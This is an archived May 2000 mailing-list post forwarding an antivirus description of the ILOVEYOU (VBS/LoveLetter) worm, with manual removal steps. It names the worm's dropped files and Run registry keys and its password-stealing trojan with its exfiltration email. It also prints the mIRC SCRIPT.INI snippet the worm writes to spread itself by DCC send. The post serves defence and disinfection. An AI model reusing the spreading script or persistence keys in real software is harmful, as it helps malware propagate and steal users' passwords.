How to remove LOVE-LETTER-virus

From: Sipke de Wal <sipke_at_wxs.nl>
Date: Thu May 4 17:50:04 2000

This is what i received from a friend and
I will hereby forward for your benefit

Sipke
 



Virus Name: VBS/LoveLetter.worm
Aliases: none known

Characteristics:

This worm is a VBS program that is sent attached to an email with the
subject ILOVEYOU.
The mail contains the message "kindly check the attached LOVELETTER
coming from me."

The attachment is called LOVE-LETTER-FOR-YOU.TXT.vbs

If the user runs the attachment the worm runs using the Windows
Scripting Host program. This is not normally present on
Windows 95 or Windows NT unless Internet Explorer 5 is installed.

When the worm is first run it drops copies of itself in the following
places :-

C:\WINDOWS\SYSTEM\MSKERNEL32.VBS
C:\WINDOWS\WIN32DLL.VBS
C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS

It also adds the registry keys :-

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
MSKernel32=C:\WINDOWS\SYSTEM\MSKernel32.vbs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\
Win32DLL=C:\WINDOWS\Win32DLL.vbs

in order to run the worm at system start-up.


The worm replaces the following files :-

*.JPG
*.JPEG
*.MP3
*.MP2

with copies of itself and it adds the extension .VBS to the original
filename. So PICT.JPG would be replaced with PICT.JPG.VBS and this would
contain the worm.

The worm also overwrites the following files :-

*.VBS
*.VBE
*.JS
*.JSE
*.CSS
*.WSH
*.SCT
*.HTA

with copies of itself and renames the files to *.VBS.

The worm creates a file LOVE-LETTER-FOR-YOU.HTM which contains the worm
and this is then sent to the IRC channels if
the mIRC client is installed. This is accomplished by the worm replacing
the file SCRIPT.INI with the following script :-

[script]
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM
n3=}

After a short delay the worm uses Microsoft Outlook to send copies of
itself to all entries in the address book.
The mails will be of the same format as the original mail.


This worm also has another trick up it's sleeve in that it tries to
download and install an executable file called WIN-BUGSFIX.EXE from the
Internet. This exe file is a password stealing program that will email
any cached passwords
to the mail address MAILME_at_SUPER.NET.PH

In order to facilitate this download the worm sets the start-up page of
Microsoft Internet Explorer to point to the web-page containing the
password stealing trojan.

The email sent by this program is as follows :-


From: goat1_at_192.168.0.2To: mailme_at_super.net.phSubject: Barok...
email.passwords.sender.trojanX-Mailer: Barok...
email.passwords.sender.trojan---by: spyderHost: goat1Username: Goat1IP
Address: 192.168.0.2

RAS Passwords:...
<password information goes here>
...
Cache Passwords:...
<password information goes here>
...

goatserver.goatnet/goatserver.goatnet : GOATNET\goat1:

MAPI : MAPI



The password stealing trojan is also installed via the following
registry key :-

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX

to auto run at system start-up.

After it has been run the password stealing trojan copies itself to
WINDOWS\SYSTEM\WinFAT32.EXE and replaces the registry key with

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinFAT32=Wi
nFAT32.EXE



Date Discovered: Thursday May 4th 2000
DAT included: 4077
Risk: High


> How to disinfect : Virus "I LOVE YOU"
> >
> > 1/ Kill all process called "wscript.exe" from the Windows NT
> > TaskManager or
> > from the running applications taskbar.
> >
> > 2/ Execute the "regedit" program from "Start" menu/"Run..."
> > 3/ Using this program, go in
> > "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" and
> > remove the entry containing MSKernel32.vbs
> > 4/ Do the same with
> > "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
> > RunServices"
> > and Win32DLL.vbs
> >
> > 5/ Go in "HKEY_CURRENT_USER\Software\Microsoft\Internet
> > Explorer\Main" and
> > change the value of "Start Page" to "about:blank"
> >
> > 6/ The virus also infects files on network drives by writing the virus
> > script in files with those extensions: vbs, vbe, js, jse,
> > css, wsh, sct,
> > hta, jpeg, jpg, mp3, mp2. You can check this by making a
> > "Find" on every
> > network drive, looking for the string "loveletter" (in the
> > field "Containing
> > text:").
> >
> > Look in your sent items to check to who you sent the virus.
> >
Received on Thu May 04 2000 - 17:50:04 BST

This archive was generated by hypermail 2.3.0 : Fri Oct 10 2014 - 23:33:08 BST